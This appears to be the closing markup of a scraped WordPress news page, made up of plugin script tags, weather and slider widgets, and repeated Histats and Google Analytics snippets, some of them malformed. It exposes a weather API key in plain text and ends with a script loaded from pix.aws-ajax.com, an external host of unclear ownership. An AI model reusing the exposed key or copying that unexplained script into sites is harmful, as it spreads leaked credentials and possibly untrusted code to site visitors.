        Version: 7.2 (rara)
        Deploy mode: deploy
        
        uid: 58fb774ab5a8e
    -->

    <script type='text/javascript' src='http://www.thenewstrack.com/wp-content/plugins/akismet/_inc/form.js?ver=3.3'></script>
<script type='text/javascript' src='http://www.thenewstrack.com/wp-content/plugins/super-zoom-gallery/szg-script.js'></script>
<script type='text/javascript' src='http://www.thenewstrack.com/?b639451239=1a0dcf493b'></script>
<script type='text/javascript' src='http://www.thenewstrack.com/?b639451239=36e1be34da'></script>
<script type='text/javascript' src='http://www.thenewstrack.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var _wpcf7 = {"recaptcha":{"messages":{"empty":"Please verify that you are not a robot."}}};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.thenewstrack.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.7'></script>
<script type='text/javascript' src='http://www.thenewstrack.com/wp-content/plugins/light/js/jquery.fancybox.pack.js?ver=4.6.5'></script>
<script type='text/javascript' src='http://www.thenewstrack.com/wp-content/plugins/light/js/light.js?ver=4.6.5'></script>
<script type='text/javascript' src='http://www.thenewstrack.com/wp-content/plugins/easy-social-share-buttons3/assets/js/easy-social-share-buttons.js?ver=3.2.4'></script>
<script type='text/javascript' src='http://www.thenewstrack.com/wp-content/themes/Newspaper/js/tagdiv_theme.js?ver=7.2'></script>
<script type='text/javascript' src='http://www.thenewstrack.com/wp-includes/js/comment-reply.min.js?ver=4.6.5'></script>
<script type='text/javascript' src='http://www.thenewstrack.com/wp-includes/js/wp-embed.min.js?ver=4.6.5'></script>
<!-- Title diw: "Aaron Hernandez Wrote Suicide Note To Alleged Gay Prison Lover Before Death — Report | " : "|" : "right" -->

<!-- JS generated by theme -->

<script>
    

			
				jQuery().ready(function () {
					tdWeather.addItem({"block_uid":"td_top_weather_uid","api_location":"New York","api_language":"en","today_icon":"shower-rain-d","today_icon_text":"light intensity drizzle","today_temp":[11.6,52.8],"today_humidity":76,"today_wind_speed":[1.5,0.9],"today_min":[10,50],"today_max":[13,55.4],"today_clouds":90,"current_unit":0,"forecast":[{"timestamp":1492963200,"day_temp":[12,54],"day_name":"Sun","owm_day_index":1},{"timestamp":1493049600,"day_temp":[14,57],"day_name":"Mon","owm_day_index":2},{"timestamp":1493136000,"day_temp":[15,58],"day_name":"Tue","owm_day_index":3},{"timestamp":1493222400,"day_temp":[19,67],"day_name":"Wed","owm_day_index":4},{"timestamp":1493308800,"day_temp":[18,65],"day_name":"Thu","owm_day_index":5}],"api_key":"5f0e41b16ad3752a1ccb886bceb5ed51"});
				});
			
			

jQuery(document).ready(function() {
    jQuery("#td_uid_14_58fb774a9a431").iosSlider({
        snapToChildren: true,
        desktopClickDrag: true,
        keyboardControls: false,
        responsiveSlideContainer: true,
        responsiveSlides: true,
        

        infiniteSlider: true,
        navPrevSelector: jQuery("#td_uid_14_58fb774a9a431 .prevButton"),
        navNextSelector: jQuery("#td_uid_14_58fb774a9a431 .nextButton")
        ,
                //onSliderLoaded : td_resize_normal_slide,
                //onSliderResize : td_resize_normal_slide_and_update
    });
});
    

			
				jQuery().ready(function () {
					tdWeather.addItem({"block_uid":"td_uid_16_58fb774aa8088","api_location":"New York","api_language":"en","today_icon":"shower-rain-d","today_icon_text":"light intensity drizzle","today_temp":[11.6,52.8],"today_humidity":76,"today_wind_speed":[1.5,0.9],"today_min":[10,50],"today_max":[13,55.4],"today_clouds":90,"current_unit":0,"forecast":[{"timestamp":1492963200,"day_temp":[12,54],"day_name":"Sun","owm_day_index":1},{"timestamp":1493049600,"day_temp":[14,57],"day_name":"Mon","owm_day_index":2},{"timestamp":1493136000,"day_temp":[15,58],"day_name":"Tue","owm_day_index":3},{"timestamp":1493222400,"day_temp":[19,67],"day_name":"Wed","owm_day_index":4},{"timestamp":1493308800,"day_temp":[18,65],"day_name":"Thu","owm_day_index":5}],"api_key":"5f0e41b16ad3752a1ccb886bceb5ed51"});
				});
			
			

	

		(function(){
			var html_jquery_obj = jQuery('html');

			if (html_jquery_obj.length && (html_jquery_obj.is('.ie8') || html_jquery_obj.is('.ie9'))) {

				var path = 'http://www.thenewstrack.com/wp-content/themes/Newspaper/style.css';

				jQuery.get(path, function(data) {

					var str_split_separator = '#td_css_split_separator';
					var arr_splits = data.split(str_split_separator);
					var arr_length = arr_splits.length;

					if (arr_length > 1) {

						var dir_path = 'http://www.thenewstrack.com/wp-content/themes/Newspaper';
						var splited_css = '';

						for (var i = 0; i < arr_length; i++) {
							if (i > 0) {
								arr_splits[i] = str_split_separator + ' ' + arr_splits[i];
							}
							//jQuery('head').append('<style>' + arr_splits[i] + '</style>');

							var formated_str = arr_splits[i].replace(/\surl\(\'(?!data\:)/gi, function regex_function(str) {
								return ' url(\'' + dir_path + '/' + str.replace(/url\(\'/gi, '').replace(/^\s+|\s+$/gm,'');
							});

							splited_css += "<style>" + formated_str + "</style>";
						}

						var td_theme_css = jQuery('link#td-theme-css');

						if (td_theme_css.length) {
							td_theme_css.after(splited_css);
						}
					}
				});
			}
		})();

	
	
</script>

<style type="text/css">.essb_morepopup_shadow {position:fixed; _position:absolute; /* hack for IE 6*/ height:100%; width:100%; top:0; left:0; background: rgba(33, 33, 33, 0.85); z-index:100000; display: none; } .essb_morepopup { background-color: #ffffff; z-index: 100001; -webkit-box-shadow: 0 0 20px rgba(0, 0, 0, 0.3); -moz-box-shadow: 0 0 20px rgba(0, 0, 0, 0.3); -ms-box-shadow: 0 0 20px rgba(0, 0, 0, 0.3); -o-box-shadow: 0 0 20px rgba(0, 0, 0, 0.3); box-shadow: 0 0 20px rgba(0, 0, 0, 0.3); display: none; color: #111; -webkit-border-radius: 5px; -moz-border-radius: 5px; border-radius: 5px;} .essb_morepopup_content { padding: 15px; margin: 0; text-align: center;} .essb_morepopup_content .essb_links a { text-align: left; } .essb_morepopup_close { width:12px; height:12px; display:inline-block; position:absolute; top:10px; right:10px; -webkit-transition:all ease 0.50s; transition:all ease 0.75s; font-weight:bold; text-decoration:none; color:#111; line-height:160%; font-size:24px; background-image: url(data:image/svg+xml;base64,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); background-size: 12px; z-index: 1001; }</style><script type="text/javascript">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</script>   <!-- Histats.com  START  (aync)-->
<script type="text/javascript">var _Hasync= _Hasync|| [];
_Hasync.push(['Histats.start', '1,2186685,4,0,0,0,00010000']);
_Hasync.push(['Histats.fasi', '1']);
_Hasync.push(['Histats.track_hits', '']);
(function() {
var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
hs.src = ('//s10.histats.com/js15_as.js');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);
})();</script>
<noscript><a href="/" target="_blank"><img  src="//sstatic1.histats.com/0.gif?2186685&101" alt="counter stats" border="0"></a></noscript>
<!-- Histats.com  END  -->
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-68063521-1', 'auto');
  ga('send', 'pageview');

</script>
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-43783327-1', 'auto');
  ga('send', 'pageview');

</script>
   <!-- Histats.com  START  (aync)-->
<script type="text/javascript">var _Hasync= _Hasync|| [];
_Hasync.push(['Histats.start', '1,2186685,4,0,0,0,00010000']);
_Hasync.push(['Histats.fasi', '1']);
_Hasync.push(['Histats.track_hits', '']);
(function() {
var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
hs.src = ('//s10.histats.com/js15_as.js');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);
})();</script>
<noscript><a href="/" target="_blank"><img  src="//sstatic1.histats.com/0.gif?2186685&101" alt="counter stats" border="0"></a></noscript>
<!-- Histats.com  END  -->
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-43783327-1', 'auto');
  ga('send', 'pageview');

</script>
   <!-- Histats.com  START  (aync)-->
<script type="text/javascript">var _Hasync= _Hasync|| [];
_Hasync.push(['Histats.start', '1,2186685,4,0,0,0,00010000']);
_Hasync.push(['Histats.fasi', '1']);
_Hasync.push(['Histats.track_hits', '']);
(function() {
var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
hs.src = ('//s10.histats.com/js15_as.js');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);
})();</script>
<noscript><a href="/" target="_blank"><img  src="//sstatic1.histats.com/0.gif?2186685&101" alt="counter stats" border="0"></a></noscript>
<!-- Histats.com  END  -->
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-43783327-1', 'auto');
  ga('send', 'pageview');

</script>
   <!-- Histats.com  START  (aync)-->
<script type="text/javascript">var _Hasync= _Hasync|| [];
_Hasync.push(['Histats.start', '1,2186685,4,0,0,0,00010000']);
_Hasync.push(['Histats.fasi', '1']);
_Hasync.push(['Histats.track_hits', '']);
(function() {
var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
hs.src = ('//s10.histats.com/js15_as.js');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);
})();</script>
<noscript><a href="/" target="_blank"><img  src="//sstatic1.histats.com/0.gif?2186685&101" alt="counter stats" border="0"></a></noscript>
<!-- Histats.com  END  -->
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-43783327-1', 'auto');
  ga('send', 'pageview');
<script src="http://cf.ads.kontextua.com/container/tags/82120.js"></script>

<script async type="text/javascript" src="http://pix.aws-ajax.com/pixel-thenewstrack.js?"></script>
</html>